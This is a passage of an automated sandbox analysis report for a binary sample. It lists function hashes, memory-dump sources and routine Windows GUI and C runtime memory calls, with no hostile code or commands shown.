                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 9789b29ce189c47e11f79d3f47c4af3f176f12b28a23fe709248d4240fff93bc
                                                              • Instruction ID: 9b36ee5024de9c3084c2390a4da3b8350932232d56e14c63a606dfc6cf84b8f6
                                                              • Opcode Fuzzy Hash: 9789b29ce189c47e11f79d3f47c4af3f176f12b28a23fe709248d4240fff93bc
                                                              • Instruction Fuzzy Hash: EEA00270602241DFDB44CF39AF8D74D3BEDBA656D1709436AB509C9170EF3496A1AB01
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                              • Instruction ID: a8c5810335524253a7e06320324b9461651498507d3a6552924e87b98b993e17
                                                              • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                              • Instruction Fuzzy Hash: 8262B3716047889FCF25DF28C8906B9BBE1FF95304F08896DE89ACB346E634E955CB11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                              • Instruction ID: 65899da2231785b746762e2bcfdd63590d1d5d2e57f69c51c676d6acb2e81242
                                                              • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                              • Instruction Fuzzy Hash: 8862A1716187898FCF19DF28C8809A9BBE1FF95304F1C896DE89ACB346D630E945CB15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction ID: 2dde91d3eab7fd13303090221f26e77c1d06b89206d2e0484e99812e792f12ab
                                                              • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction Fuzzy Hash: E0523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 002c2d9a827dac7c59a6c382ecfde20e9c79b7834ce2e82c4f0ddb1a73874b03
                                                              • Instruction ID: 2f8b47aaac070bef61a96ff0f5d5dc41f205828faf966684a6557fc98d7e76e5
                                                              • Opcode Fuzzy Hash: 002c2d9a827dac7c59a6c382ecfde20e9c79b7834ce2e82c4f0ddb1a73874b03
                                                              • Instruction Fuzzy Hash: 2812C2B16287069FCB18DF28C490A79B7E0FF94308F18492EE997C7781E334A995DB45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daeae3e3bd827b579852567c6450e8505b68033da15ac91cbb15ced0c95b32bd
                                                              • Instruction ID: f78f6486fa5e7c869e1dbd397f83aea012e131a6daa1cdc6f03c03212f471dd9
                                                              • Opcode Fuzzy Hash: daeae3e3bd827b579852567c6450e8505b68033da15ac91cbb15ced0c95b32bd
                                                              • Instruction Fuzzy Hash: 3FF19E716083058FC754EF28C88462ABBE5FFDA318F144A6EF485D725AE730E945CB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: bead7fccc9e57a0ed041a5437c30ca538246373d8e308b151ba7e3b2219b32b0
                                                              • Instruction ID: 61a0348beb2082d093df73795647173bbd532f28b39ae07a93455ad718133243
                                                              • Opcode Fuzzy Hash: bead7fccc9e57a0ed041a5437c30ca538246373d8e308b151ba7e3b2219b32b0
                                                              • Instruction Fuzzy Hash: D8D19FB1A083458FDF14EF28C88475ABBE1FF89308F18456DE889DB242E774E915CB56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1188c6ec15abfd7918736f612090a21ca3c66ea883abf3c4ff184bb2283a64e4
                                                              • Instruction ID: 8495b790ddad6b7f9abf3c24d8c1395f094e7610984e64d0f9358e8537c4866d
                                                              • Opcode Fuzzy Hash: 1188c6ec15abfd7918736f612090a21ca3c66ea883abf3c4ff184bb2283a64e4
                                                              • Instruction Fuzzy Hash: D9E137755083948FC704CF29D89086ABFF0BF9A300F49096EF9D497352D235EA59DBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                              • Instruction ID: 435807c62f4d3b8a31eecc9713bbdd0a98a3e6b6b5e0f707a0afbb3cc3de8587
                                                              • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                              • Instruction Fuzzy Hash: EC9126B02003499BDF28FBA8D895FBA77D5FB90304F18092DF596C72C2EA649946C752
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction ID: c6271c3063be87a00b3108a5ec4615db25bffbba495ada4cb10513c070b3e9d8
                                                              • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction Fuzzy Hash: 1C812DB13043455BEF29FEA8C891FBD37D4FB95308F08193DE586CB282DA6089878756
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a214a28a4d7c93a9dfa2e98523c171dcce611877c2a0a39279c6f9c005a501b5
                                                              • Instruction ID: efa12f2fe6679b58a7fa73dff33683fa4b8ff2067f0aacffb165661253e6f4e2
                                                              • Opcode Fuzzy Hash: a214a28a4d7c93a9dfa2e98523c171dcce611877c2a0a39279c6f9c005a501b5
                                                              • Instruction Fuzzy Hash: DE617A71600F0867FF389A6CA8957BE6394FB83754F140519E583DFF82D6A1DDC28216
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                              • Instruction ID: 0fc047e425da2eb02cd4ad042e47afb2f4f96de632632bbc0f7434fa77edee22
                                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                              • Instruction Fuzzy Hash: 77513461200E485BFF3446288556BBF7385FB43304F182819E982CBE82DA85EDC583A6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5808dad063622eb4b25f58ff1734f70e34137da536e626100cd8790671278cb5
                                                              • Instruction ID: aa24e2fb04271193cb7f03d85f0c7e86a98c517cb8ea04f0732167b89ae11610
                                                              • Opcode Fuzzy Hash: 5808dad063622eb4b25f58ff1734f70e34137da536e626100cd8790671278cb5
                                                              • Instruction Fuzzy Hash: 9951E1755083D58FC712EF28C1444AEBFE0FEDA314F4909ADE5D99B243D221DA4ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d4fa54679f82bf92001250b0c42cc868e23cffe4acd035a5fe11baed7aca35e9
                                                              • Instruction ID: cfafbba012ab419d7474a356b423ac7cb966b534e8a2f5573028be465cd5f879
                                                              • Opcode Fuzzy Hash: d4fa54679f82bf92001250b0c42cc868e23cffe4acd035a5fe11baed7aca35e9
                                                              • Instruction Fuzzy Hash: 2551D0B1A087159FC748CF19D88055AF7E1FF88314F058A2EE899E3740D734E959CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction ID: a5239d6fd1adf56b47e8a4045cfbae8abe37bd672ef98e8cd5a996f76f2144ae
                                                              • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction Fuzzy Hash: E231E7B1A147468FCB18EF28C85116EBBE0FB95304F14452DE495D7741CB35EA0ACB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0088E30E
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                                • Part of subcall function 00891DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008C1030,00000200,0088D928,00000000,?,00000050,008C1030), ref: 00891DC4
                                                              • _strlen.LIBCMT ref: 0088E32F
                                                              • SetDlgItemTextW.USER32(?,008BE274,?), ref: 0088E38F
                                                              • GetWindowRect.USER32(?,?), ref: 0088E3C9
                                                              • GetClientRect.USER32(?,?), ref: 0088E3D5
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0088E475
                                                              • GetWindowRect.USER32(?,?), ref: 0088E4A2
                                                              • SetWindowTextW.USER32(?,?), ref: 0088E4DB
                                                              • GetSystemMetrics.USER32(00000008), ref: 0088E4E3
                                                              • GetWindow.USER32(?,00000005), ref: 0088E4EE
                                                              • GetWindowRect.USER32(00000000,?), ref: 0088E51B
                                                              • GetWindow.USER32(00000000,00000002), ref: 0088E58D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                              • String ID: $%s:$CAPTION$d
                                                              • API String ID: 2407758923-2512411981
                                                              • Opcode ID: fd67306fefb3e357cf4dceb01830344d7eb25e0388d146c263a9fae8d4db07f7
                                                              • Instruction ID: 8d483ac0a403a70fae4a8a48fa61079cba1403006fbea7b6e30ccef5ec922c93
                                                              • Opcode Fuzzy Hash: fd67306fefb3e357cf4dceb01830344d7eb25e0388d146c263a9fae8d4db07f7
                                                              • Instruction Fuzzy Hash: 2C818172208341AFD710EFA8CD89A6FBBE9FB89704F04091DFA85D7250D675ED058B52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 008ACB66
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC71E
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC730
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC742
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC754
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC766
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC778
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC78A
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC79C
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7AE
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7C0
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7D2
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7E4
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7F6
                                                              • _free.LIBCMT ref: 008ACB5B
                                                                • Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
                                                                • Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4
                                                              • _free.LIBCMT ref: 008ACB7D
                                                              • _free.LIBCMT ref: 008ACB92
                                                              • _free.LIBCMT ref: 008ACB9D
                                                              • _free.LIBCMT ref: 008ACBBF
                                                              • _free.LIBCMT ref: 008ACBD2
                                                              • _free.LIBCMT ref: 008ACBE0
                                                              • _free.LIBCMT ref: 008ACBEB
                                                              • _free.LIBCMT ref: 008ACC23
                                                              • _free.LIBCMT ref: 008ACC2A
                                                              • _free.LIBCMT ref: 008ACC47
                                                              • _free.LIBCMT ref: 008ACC5F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: 27e4672736b868c6c3d72f6dec6c0238c042b11b7324117e32e5f36829b8a51c
                                                              • Instruction ID: 804a664a848bb88e5bdf5d366209abf5fe854f69ed4d29a6b9920f215fb4be87
                                                              • Opcode Fuzzy Hash: 27e4672736b868c6c3d72f6dec6c0238c042b11b7324117e32e5f36829b8a51c
